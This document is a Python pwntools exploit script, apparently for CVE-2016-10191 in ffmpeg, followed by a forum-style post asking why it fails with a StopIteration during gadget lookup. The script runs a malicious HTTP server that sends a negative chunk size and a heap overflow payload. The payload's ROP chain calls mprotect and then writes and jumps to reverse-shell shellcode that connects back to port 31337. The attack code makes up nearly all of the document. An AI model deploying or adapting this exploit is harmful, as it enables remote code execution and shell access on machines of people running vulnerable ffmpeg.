#!/usr/bin/python | |
import re | |
import os | |
import sys | |
import socket | |
import threading | |
from time import sleep | |
from pwn import * | |
# Listener address used by the server loop under __main__.
# '0.0.0.0' is every local interface, not only loopback.
bind_ip = '0.0.0.0'
bind_port = 12345

# Static response prefix: advertises chunked transfer-encoding and is padded
# with a run of identical Set-Cookie lines. Sent verbatim by handle_request.
headers = """HTTP/1.1 200 OK
Server: HTTPd/0.9
Date: Sun, 10 Apr 2005 20:26:47 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Set-Cookie: XXXXXXXXXXXXXXXX=AAAAAAAAAAAAAAAA;
Set-Cookie: XXXXXXXXXXXXXXXX=AAAAAAAAAAAAAAAA;
Set-Cookie: XXXXXXXXXXXXXXXX=AAAAAAAAAAAAAAAA;
Set-Cookie: XXXXXXXXXXXXXXXX=AAAAAAAAAAAAAAAA;
Set-Cookie: XXXXXXXXXXXXXXXX=AAAAAAAAAAAAAAAA;
Set-Cookie: XXXXXXXXXXXXXXXX=AAAAAAAAAAAAAAAA;
Set-Cookie: XXXXXXXXXXXXXXXX=AAAAAAAAAAAAAAAA;
Set-Cookie: XXXXXXXXXXXXXXXX=AAAAAAAAAAAAAAAA;
Set-Cookie: XXXXXXXXXXXXXXXX=AAAAAAAAAAAAAAAA;
Set-Cookie: XXXXXXXXXXXXXXXX=AAAAAAAAAAAAAAAA;
Set-Cookie: XXXXXXXXXXXXXXXX=AAAAAAAAAAAAAAAA;
Set-Cookie: XXXXXXXXXXXXXXXX=AAAAAAAAAAAAAAAA;
Set-Cookie: XXXXXXXXXXXXXXXX=AAAAAAAAAAAAAAAA;
"""

# Binary the gadgets are searched in (pwntools ELF), plus the three values
# handle_request hands to mprotect() through its PLT stub.
elf = ELF('ffmpeg/ffmpeg')
shellcode_location = 0x00400000  # address passed as the mprotect() start
page_size = 0x1000               # mprotect() length
rwx_mode = 7                     # PROT_READ | PROT_WRITE | PROT_EXEC


def gadget(x):
    """Return the first address in ``elf`` whose bytes match the assembled snippet ``x``.

    ``x`` is assembled for linux/amd64 and looked up with ``elf.search``;
    ``next()`` is called without a default, so a snippet that does not occur
    in the binary raises ``StopIteration`` (the failure pasted in the
    comments below is exactly this case).
    """
    return next(elf.search(asm(x, os='linux', arch='amd64')))


# Gadget addresses referenced by name from handle_request, resolved in the
# same order as the snippets listed here.
(pop_rdi, pop_rsi, pop_rax, pop_rcx, pop_rdx, pop_rbp,
 push_rbx, pop_rsp, add_rsp, mov_gadget) = [
    gadget(snippet) for snippet in (
        'pop rdi; ret',
        'pop rsi; ret',
        'pop rax; ret',
        'pop rcx; ret',
        'pop rdx; ret',
        'pop rbp; ret',
        'push rbx; jmp rdi',
        'pop rsp; ret',
        'add rsp, 0x58',
        'mov qword [rcx], rax ; ret',
    )
]

# PLT entries. read_func is not referenced anywhere else in this file.
mprotect_func = elf.plt['mprotect']
read_func = elf.plt['read']
def handle_request(client_socket):
    """Answer one accepted connection with the crafted HTTP response, then close it.

    Three writes are made: the module-level ``headers`` block (which
    advertises ``Transfer-Encoding: chunked``), a chunk-size line holding
    the literal ``-1`` followed by a newline, and -- after a five-second
    pause -- ``payload``, the byte string assembled below. The client's
    request is read but never inspected.

    Args:
        client_socket: a connected socket; it is closed before returning.

    Raises:
        Any ``socket`` error from recv()/send() propagates; nothing is caught.
    """
    request = client_socket.recv(2048)  # up to 2048 bytes; value unused
    # Python 2 str concatenation throughout: pwntools p64()/p32() return
    # 8-/4-byte strings, so payload is a flat byte sequence whose layout
    # depends on this exact statement order.
    payload = ''
    payload += 'C' * (0x8040)
    payload += 'CCCCCCCC' * 4
    payload += p64(0x0058dc48) # rop starts here ('add rsp, 0x58 ; ret' per the gadget list below)
    payload += 'CCCCCCCC' * 4
    payload += p64(0x00d89257) # rdi -- NOTE(review): the gadget list below labels this address 'pop rsp ; ret'; this inline label looks stale
    payload += p64(0x010ccd95) # call *%rax -- NOTE(review): listed below as 'push rbx ; jmp rdi'
    payload += 'BBBBBBBB' * 3
    payload += 'AAAA'
    payload += p32(0)
    payload += 'AAAAAAAA'
    payload += p64(0x0058dc48) # second add_esp rop to jump to uncorrupted chunk
    payload += 'XXXXXXXX' * 11
    # real rop payload starts here
    #
    # using mprotect to create executable area:
    #   rdi <- shellcode_location, rsi <- page_size, rdx <- rwx_mode,
    #   then return into the mprotect PLT stub. The gadgets pop_rsp,
    #   push_rbx and add_rsp resolved at import time are not used here;
    #   the corresponding addresses above are hard-coded instead.
    payload += p64(pop_rdi)
    payload += p64(shellcode_location)
    payload += p64(pop_rsi)
    payload += p64(page_size)
    payload += p64(pop_rdx)
    payload += p64(rwx_mode)
    payload += p64(mprotect_func)
    # backconnect shellcode x86_64: 127.0.0.1:31337
    shellcode = "\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x4d\x31\xc0\x6a\x02\x5f\x6a\x01\x5e\x6a\x06\x5a\x6a\x29\x58\x0f\x05\x49\x89\xc0\x48\x31\xf6\x4d\x31\xd2\x41\x52\xc6\x04\x24\x02\x66\xc7\x44\x24\x02\x7a\x69\xc7\x44\x24\x04\x7f\x00\x00\x01\x48\x89\xe6\x6a\x10\x5a\x41\x50\x5f\x6a\x2a\x58\x0f\x05\x48\x31\xf6\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x48\x31\xff\x57\x57\x5e\x5a\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05";
    # Prepend 1..8 NOP bytes so the length is a multiple of 8, then cut the
    # string into 8-byte slices (under Python 2, which this script targets,
    # map() yields a list).
    shellcode = '\x90' * (8 - (len(shellcode) % 8)) + shellcode
    shellslices = map(''.join, zip(*[iter(shellcode)]*8))
    # Each slice is stored with 'mov qword [rcx], rax': rax <- the 8 raw
    # bytes, rcx <- destination. Writes start 8 bytes below
    # shellcode_location and advance by 8 per slice.
    write_location = shellcode_location - 8
    for shellslice in shellslices:
        payload += p64(pop_rax)
        payload += shellslice
        payload += p64(pop_rcx)
        payload += p64(write_location)
        payload += p64(mov_gadget)
        write_location += 8
    # 'pop rbp; ret': rbp <- 4, and the ret then lands on shellcode_location.
    payload += p64(pop_rbp)
    payload += p64(4)
    payload += p64(shellcode_location)
    # 0x009e5641: mov qword [rcx], rax ; ret ; (1 found)
    # 0x010ccd95: push rbx ; jmp rdi ; (1 found)
    # 0x00d89257: pop rsp ; ret ; (1 found)
    # 0x0058dc48: add rsp, 0x58 ; ret ; (1 found)
    # Delivery: headers, the '-1' chunk-size line, a 5 s pause, the payload.
    client_socket.send(headers)
    client_socket.send('-1\n')
    sleep(5)
    client_socket.send(payload)
    client_socket.close()
if __name__ == '__main__':
    # Plain TCP listener on bind_ip/bind_port. bind_ip is '0.0.0.0' above,
    # so the listener is reachable on every local interface, not only
    # loopback. SO_REUSEADDR lets a restart rebind the port immediately.
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    s.bind((bind_ip, bind_port))
    s.listen(5)
    # Snapshot of this script's own stat() so the loop can notice edits.
    # Only the basename is used, so the lookup works only when the current
    # directory is the script's directory.
    filename = os.path.basename(__file__)
    st = os.stat(filename)
    while True:
        # One connection at a time; handle_request closes the client socket.
        # The listening socket s is never closed explicitly.
        client_socket, addr = s.accept()
        handle_request(client_socket)
        # Exit (for an external restart) once the script file changes.
        # NOTE(review): stat_result equality also covers st_atime, so a
        # plain read of the file could trip this -- confirm on the host.
        if os.stat(filename) != st:
            print 'restarted'  # Python 2 print statement
            sys.exit(0)
Lately I have wanted to reproduce this bug,
but when I run this script I get this output, and I cannot find any information about it on the internet. Can anybody help me?
[@inspiron]:[CVE_2016_10191]$ ./exploit_ffmpeg.py
[] '/media/*/750G-01/downloads/CVE_2016_10191/bin/ffmpeg'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x400000)
FORTIFY: Enabled
Traceback (most recent call last):
File "./exploit_ffmpeg.py", line 56, in
mov_gadget = gadget('mov qword [rcx], rax; ret')
File "./exploit_ffmpeg.py", line 44, in
gadget = lambda x: next(elf.search(asm(x, os='linux', arch='amd64')))
StopIteration
My system is:
Linux inspiron 4.10.0-35-generic #39~16.04.1-Ubuntu SMP Wed Sep 13 09:02:42 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux